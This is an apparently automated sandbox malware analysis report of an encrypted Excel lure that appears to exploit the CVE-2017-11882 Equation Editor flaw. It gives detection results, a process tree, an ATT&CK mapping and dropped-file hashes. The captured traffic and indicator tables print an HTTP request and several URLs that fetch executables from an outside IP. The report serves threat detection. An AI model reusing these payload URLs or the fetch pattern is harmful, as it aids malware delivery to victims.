Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Seafood Order and Company Profile.xlsx

Overview

General Information

Sample Name:Seafood Order and Company Profile.xlsx
Analysis ID:435320
MD5:4c9867155a69c0e089cbf6e287442798
SHA1:72fd5acd0ce33714c3aff9e837af3be0db733800
SHA256:9fcc8435ac8254ae9b1dea93cff53098e94d193ea4edef5b5300e7c8f0328d2c
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Allocates a big amount of memory (probably used for heap spraying)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2524 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2772 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

Exploits:

barindex
Sigma detected: EQNEDT32.EXE connecting to internetShow sources
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.133.109.192, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2772, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Seafood Order and Company Profile.xlsxReversingLabs: Detection: 30%

Exploits:

barindex
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: excel.exeMemory has grown: Private usage: 4MB later: 64MB
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.133.109.192:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.133.109.192:80
Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: global trafficHTTP traffic detected: GET /cbinvst/cbn.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.133.109.192Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 103.133.109.192
Source: unknownTCP traffic detected without corresponding DNS query: 103.133.109.192
Source: unknownTCP traffic detected without corresponding DNS query: 103.133.109.192
Source: unknownTCP traffic detected without corresponding DNS query: 103.133.109.192
Source: unknownTCP traffic detected without corresponding DNS query: 103.133.109.192
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2B60F8F.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /cbinvst/cbn.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.133.109.192Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Jun 2021 10:17:42 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Content-Length: 302Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 37 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 50 48 50 2f 37 2e 33 2e 32 38 20 53 65 72 76 65 72 20 61 74 20 31 30 33 2e 31 33 33 2e 31 30 39 2e 31 39 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Server at 103.133.109.192 Port 80</address></body></html>
Source: E2B60F8F.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
Source: Seafood Order and Company Profile.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal56.expl.winXLSX@2/18@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Seafood Order and Company Profile.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE2DF.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Seafood Order and Company Profile.xlsxReversingLabs: Detection: 30%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: Seafood Order and Company Profile.xlsxStatic file information: File size 1315840 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Seafood Order and Company Profile.xlsxInitial sample: OLE indicators vbamacros = False
Source: Seafood Order and Company Profile.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Seafood Order and Company Profile.xlsxStream path 'EncryptedPackage' entropy: 7.9998536578 (max. 8.0)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 260Thread sleep time: -420000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2408Thread sleep time: -60000s >= -30000sJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExploitation for Client Execution2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Seafood Order and Company Profile.xlsx30%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://103.133.109.192/cbinvst/cbn.exe0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://103.133.109.192/cbinvst/cbn.exetrue
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.day.com/dam/1.0E2B60F8F.emf.0.drfalse
    		high

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    103.133.109.192
    		unknownViet Nam
    		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

    General Information

    Joe Sandbox Version:32.0.0 Black Diamond
    Analysis ID:435320
    Start date:16.06.2021
    Start time:12:16:23
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 51s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Seafood Order and Company Profile.xlsx
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal56.expl.winXLSX@2/18@0/1
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsx
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/435320/sample/Seafood Order and Company Profile.xlsx

    Simulations

    Behavior and APIs

    TimeTypeDescription
    12:17:04API Interceptor59x Sleep call for process: EQNEDT32.EXE modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    103.133.109.192Payment confirmation for due Invoices.xlsxGet hashmaliciousBrowse
    • 103.133.109.192/receipwt/vbc.exe
    9c53i223dE.xlsxGet hashmaliciousBrowse
    • 103.133.109.192/receipot/vbc.exe
    Company profile and new order details.xlsxGet hashmaliciousBrowse
    • 103.133.109.192/receipot/vbc.exe

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNRFQ.exeGet hashmaliciousBrowse
    • 103.140.250.132
    NEW ORDER.xlsxGet hashmaliciousBrowse
    • 103.140.251.225
    Purchase Contract.jarGet hashmaliciousBrowse
    • 103.133.104.124
    Booking.pdf.exeGet hashmaliciousBrowse
    • 103.140.250.132
    DHL_June 2021 at 11M_9BZ7290_PDF.exeGet hashmaliciousBrowse
    • 103.133.109.176
    Spec Design.exeGet hashmaliciousBrowse
    • 180.214.238.96
    YEj2a2f6ai.exeGet hashmaliciousBrowse
    • 103.114.104.219
    Purchase Contract.jarGet hashmaliciousBrowse
    • 103.133.104.124
    M113461.exeGet hashmaliciousBrowse
    • 103.89.91.38
    Draft HUD.jarGet hashmaliciousBrowse
    • 103.133.104.124
    MV SHUHA QUEEN.docxGet hashmaliciousBrowse
    • 103.133.106.72
    MV SHUHA QUEEN.docxGet hashmaliciousBrowse
    • 103.133.106.72
    8KfPvyojv5.exeGet hashmaliciousBrowse
    • 103.149.13.196
    vpUOv3498p.exeGet hashmaliciousBrowse
    • 103.133.109.176
    9n7miZydYC.exeGet hashmaliciousBrowse
    • 103.133.106.117
    NEW ORDER Ref PO-298721.docGet hashmaliciousBrowse
    • 103.133.106.117
    2-2.exeGet hashmaliciousBrowse
    • 103.114.107.28
    3-1.exeGet hashmaliciousBrowse
    • 103.114.107.28
    2-3.exeGet hashmaliciousBrowse
    • 103.114.107.28
    3-2.exeGet hashmaliciousBrowse
    • 103.114.107.28

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1AADFD09.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):79394
    Entropy (8bit):7.864111100215953
    Encrypted:false
    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
    MD5:16925690E9B366EA60B610F517789AF1
    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E1C2191.jpeg
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
    Category:dropped
    Size (bytes):8815
    Entropy (8bit):7.944898651451431
    Encrypted:false
    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
    MD5:F06432656347B7042C803FE58F4043E1
    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39471903.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):50311
    Entropy (8bit):7.960958863022709
    Encrypted:false
    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
    MD5:4141C7515CE64FED13BE6D2BA33299AA
    SHA1:B290F533537A734B7030CE1269AC8C5398754194
    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D5CA76D.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):49744
    Entropy (8bit):7.99056926749243
    Encrypted:true
    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
    Malicious:false
    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4CDCACFF.jpeg
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
    Category:dropped
    Size (bytes):29499
    Entropy (8bit):7.667442162526095
    Encrypted:false
    SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
    MD5:4FBDDF16124B6C9368537DF70A238C14
    SHA1:45E34D715128C6954F589910E6D0429370D3E01A
    SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
    SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
    Malicious:false
    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58290F75.emf
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
    Category:dropped
    Size (bytes):7592
    Entropy (8bit):5.452334018432516
    Encrypted:false
    SSDEEP:96:znY+f/mcqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwi:bYCVSTxK/LA/FVoL3QtKhn+e3+wi
    MD5:174F7349639B3C21402C2DE53E860A70
    SHA1:D6215A38F72901A6A2832056E783CACD84B3855A
    SHA-256:BD4277F040C3459648B8B3121B63E0B7D3F801BD538EE715447506ACBC0187DB
    SHA-512:C35A4C84082AC42D30F4D5EA644037EFB623EA7F67AA6E48DA7CCFB52E38F8EFD4D3C6775B724110EB580AF524E749E320C5987F2230544925BF2A85CAD9B167
    Malicious:false
    Preview: ....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d...................$.^...^.'..q....\...$.^.....$.^...^.W..q....$.^..6.u_..q.......qX...Dy:w.B..........H.^...7w....$.....J.d.........^.J^.q.... ^.q.;...B..8......-...t.^..<6w................<..u.Z.v....X.S....X.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58AB66F2.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):49744
    Entropy (8bit):7.99056926749243
    Encrypted:true
    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
    Malicious:false
